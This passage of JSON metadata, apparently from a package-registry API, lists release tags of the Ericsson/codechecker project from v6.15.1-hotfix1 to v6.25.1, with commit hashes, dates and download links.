yste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1/manifests"},{"name":"v6.19.0-hotfix1","sha":"e262d015068c6b49f92a2afb1a166eb4f4438e84","kind":"commit","published_at":"2022-03-12T13:05:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0-hotfix1/manifests"},{"name":"v6.19.0","sha":"5f5b6b7e7ecd70d23079580c063f4e4f2bb2a7ad","kind":"commit","published_at":"2022-03-10T13:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.0/manifests"},{"name":"v6.18.2-hotfix1","sha":"359e88b9339946cba84c00ad32511be8b7fad65d","kind":"commit","published_at":"2022-02-03T09:31:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2-hotfix1/manifests"},{"name":"v6.18.2","sha":"992d274c78b9a0436328c30a40d3b1de899902e2","kind":"commit","published_at":"2022-01-14T14:04:31.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.2/manifests"},{"name":"v6.18.1","sha":"fd5f7e04219f947cfda68e9e11f4d3b07f0564a5","kind":"commit","published_at":"2021-12-10T07:28:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.1/manifests"},{"name":"v6.18.0-hotfix1","sha":"a46603ab87348ff5e9bf5016fd906e9ef6781eb4","kind":"commit","published_at":"2021-11-18T17:46:56.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0-hotfix1/manifests"},{"name":"v6.18.0","sha":"153b0e09efc715fd16eee815eecf454f9f79f7f1","kind":"commit","published_at":"2021-11-12T12:51:42.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.18.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.18.0/manifests"},{"name":"v6.17.0-hotfix1","sha":"315d4494603b02252966770452e676fd63a67021","kind":"commit","published_at":"2021-10-14T12:22:47.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0-hotfix1/manifests"},{"name":"v6.17.0","sha":"d0e2d7ba5f62d722e907d1ce8af6dbb24ee34e5d","kind":"commit","published_at":"2021-09-10T14:05:16.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.17.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.17.0/manifests"},{"name":"v6.16.0-hotfix1","sha":"dcb4c5c74697711e0b65bb88b1796aec34846649","kind":"commit","published_at":"2021-06-23T13:36:13.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0-hotfix1/manifests"},{"name":"v6.16.0","sha":"8880695af939838b2e1e16b018c51ed66c6a5366","kind":"commit","published_at":"2021-06-01T12:07:59.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.16.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.16.0/manifests"},{"name":"v6.15.2","sha":"63740679d61ff715175b9f31858d2fe9767efa41","kind":"commit","published_at":"2021-04-06T13:47:08.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.15.2/manifests"},{"name":"v6.15.1-hotfix1","sha":"55c53a71295e07ea9ae3370130e6495649e8760a","kind":"commit","published_at":"2021-03-10T10:18:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.15.1-hotfix1",